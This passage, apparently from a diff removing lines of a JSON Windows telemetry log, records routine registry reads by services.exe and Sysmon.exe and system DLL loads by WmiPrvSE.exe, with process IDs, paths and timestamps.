- "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "dsparse.dll", - "image_path": "C:\\Windows\\System32\\dsparse.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "tscfgwmi.dll", - "image_path": "C:\\Windows\\System32\\tscfgwmi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570847770000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - 